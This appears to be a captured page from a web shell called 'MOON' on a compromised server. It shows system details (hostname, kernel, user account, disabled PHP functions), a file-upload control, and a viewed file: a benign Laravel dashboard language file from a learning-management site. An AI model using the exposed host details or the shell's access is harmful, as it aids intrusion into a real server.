MOON
Server: Apache
System: Linux 101-53-147-124.cprapid.com 4.18.0-553.121.1.el8_10.x86_64 #1 SMP Thu Apr 30 09:06:34 EDT 2026 x86_64
User: clientsoftwares (1005)
PHP: 8.2.30
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open
Upload Files
File: /home/clientsoftwares/public_html/lms.clientsoftwares.com/resources/lang/default/dashboard.php
<?php

return [
    'Dashboard' => 'Dashboard',
    'Subjects' => 'Subjects',
    'Setting' => 'Setting',
    'Logout' => 'Logout',
    'Status Overview of Topics' => 'Status Overview of Topics',
    'Overview of Topics' => 'Overview of Topics',
    'Number of Subjects' => 'Number of Subjects',
    'Enrolled' => 'Enrolled',
    'Number of Enrolled' => 'Number of Enrolled',
    'Enrolled Amount' => 'Enrolled Amount',
    'Total Enrolled Amount' => 'Total Enrolled Amount',
    'Enrolled Today' => 'Enrolled Today',
    'Total Enrolled Today' => 'Total Enrolled Today',
    'This Month' => 'This Month',
    'Total Enrolled This Month' => 'Total Enrolled This Month',
    'Monthly Income Stats for' => 'Monthly Income Stats for',
    'Payment Statistics for' => 'Payment Statistics for',
    'Recent Enrolls' => 'Recent Enrolls',
    'Daily Wise Enroll Status for' => 'Daily Wise Enroll Status for',
    'Monthly income status' => 'Monthly income status',
    'No Results Found' => 'No Results Found',
    'Completed' => 'Completed',
    'Pending' => 'Pending',
    'Active' => 'Active',
    'Courses' => 'Courses',
    'Quizzes' => 'Quizzes',
    'Classes' => 'Classes',
    'User Login Attempt' => 'User Login Attempt',
    'User Login Chart' => 'User Login Chart',
    'By Time' => 'By Time',
    'By Date' => 'By Date',
    'Last 7 Days' => 'Last 7 Days',
    'Last 14 Days' => 'Last 14 Days',
    'Last 30 Days' => 'Last 30 Days',
    'Others' => 'Others',
    'Total student by each course' => 'Total student by each course'
];